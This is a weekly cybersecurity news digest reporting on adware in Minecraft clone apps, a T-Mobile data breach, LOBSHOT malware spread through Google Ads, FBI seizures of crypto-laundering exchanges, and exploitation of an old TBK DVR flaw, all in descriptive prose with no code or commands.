Take a look at this week's Cyber Weekly Digest for a rundown of the latest cyber security news, including the second T-Mobile data breach of the year so far and a new malware campaign being spread through Google Ads. Keep reading to stay up to date on the biggest cyber security news.‍

‍

1. Android Minecraft clones with 35 million downloads infect users with adware.

A set of 38 Minecraft imitation games on Google Play infected devices with the Android adware "HiddenAds" to stealthily load ads in the background to generate revenue for its operators. Minecraft is a popular sandbox game with 140 million monthly active players, which numerous game publishers have attempted to recreate. The Minecraft-like games hiding adware were downloaded by roughly 35 million Android users worldwide, mainly from the United States, Canada, South Korea, and Brazil. The advertisements are loaded in the background once the user launches the game, but nothing is displayed on the game screen. Network traffic analysis shows the exchange of several questionable packets generated by ad libraries of Google, AppLovin, Unity, and Supersonic, among others. Although Adware apps aren't considered dangerous for users, they can still cause performance issues for a mobile device, raise privacy concerns, and even create security loopholes that expose users to nastier infections.‍

‍

2. T-Mobile discloses a second data breach since the start of 2023, the 8th time to date.

T-Mobile disclosed the second data breach of 2023 after discovering that attackers had access to the personal information of hundreds of customers for more than a month, starting late February 2023. Compared to previous data breaches reported by T-Mobile, the latest of which impacted 37 million people, this incident affected only 836 customers. Still, the amount of exposed information is extensive and exposes affected individuals to identity theft and phishing attacks. "In March 2023, the measures we have in place to alert us to unauthorised activity worked as designed, and we were able to determine that a bad actor gained access to limited information from a small number of T-Mobile accounts between late February and March 2023," the company said in the data breach notification letters sent to affected individuals just before the weekend, on Friday. The second such incident this year, with the previous being disclosed on January 19, after attackers stole the personal information of 37 million customers by abusing a vulnerable Application Programming Interface (API) in November 2022. Since 2018, approximately 3% of all T-Mobile customers have had their information in data breaches.‍

‍

3. "LOBSHOT" malware recently distributed by Google ads with hidden VNC access on Windows.

A new malware known as "LOBSHOT" distributed using Google ads allows threat actors to stealthily take over infected Windows devices using hVNC. Earlier this year, numerous cybersecurity researchers reported a dramatic increase in threat actors utilising Google ads to distribute malware in search results. These advertising campaigns impersonated websites for 7-ZIP, VLC, OBS, Notepad++, CCleaner, TradingView, Rufus, and many more applications. However, these sites pushed malware instead of distributing legitimate applications, including Gozi, RedLine, Vidar, Cobalt Strike, SectoRAT, and Royal Ransomware. A Trojan named LOBSHOT by Elastic Security Labs was discovered to be spreading through Google Ads on a fake AnyDesk remote management software site. This site pushed a malicious MSI file that executed a PowerShell command to download a DLL from download-cdn[.]com, a domain historically associated with the TA505/Clop ransomware gang. Elastic says LOBSHOT deploys an hVNC module that allows the threat actors to control the hidden desktop using their mouse and keyboard as if they were in front of it.‍

‍

4. Crypto exchanges used to launder ransomware payments seized by the FBI.

The FBI and Ukrainian police have seized nine cryptocurrency exchange websites that facilitated money laundering for scammers and cybercriminals, including ransomware actors. In its announcement, the FBI says the operation was carried out with the help of the Virtual Currency Response Team, the National Police of Ukraine, and legal prosecutors in the country. Some of the websites that were seized: 24xbtc.com and 100btc.pro, owl.gold, and many more. When visiting these domains, you will see an official banner from the FBI regarding the site's seizure. These sites allowed users to anonymously convert cryptocurrency into harder-to-trace coins to obscure the money trace and help cybercriminals launder their crypto without being traced by law enforcement. The seized infrastructure can now be used to analyse and unmask cybercriminals who laundered money through the sites, potentially leading to more arrests in the future. Dismantling the sites and services means that law enforcement not only hinders the financial operations of ransomware groups but also sends a strong message to operators of such platforms that illegal activities will not be tolerated.‍

‍

5. 5-year-old Unpatched Vulnerability in TBK DVR Devices being exploited by hackers.

Adversaries are actively exploiting an unpatched five-year-old flaw impacting TBK digital video recording (DVR) devices, according to an advisory issued by Fortinet FortiGuard Labs. The vulnerability in question is CVE-2018-9995 (CVSS Score: 9.8), a critical authentication bypass issue that remote actors could exploit to gain elevated permissions. "The 5-year-old vulnerability (CVE-2018-9995) is due to an error when handling a maliciously crafted HTTP cookie," Fortinet said in an outbreak alert on May 1, 2023. "A remote attacker may be able to exploit this flaw to bypass authentication and obtain administrative privileges, eventually leading access to camera video feeds," Fortinet said that it overserved over 50,000 attempts to exploit TBK DVR devices using the flaw in April 2023. Despite the availability of a proof-of-concept (PoC) exploit, no fixes address the vulnerability. This flaw could allow a hacker to execute arbitrary code on the device without being authenticated due to the presence of a web shell that is accessible over a /shell URI.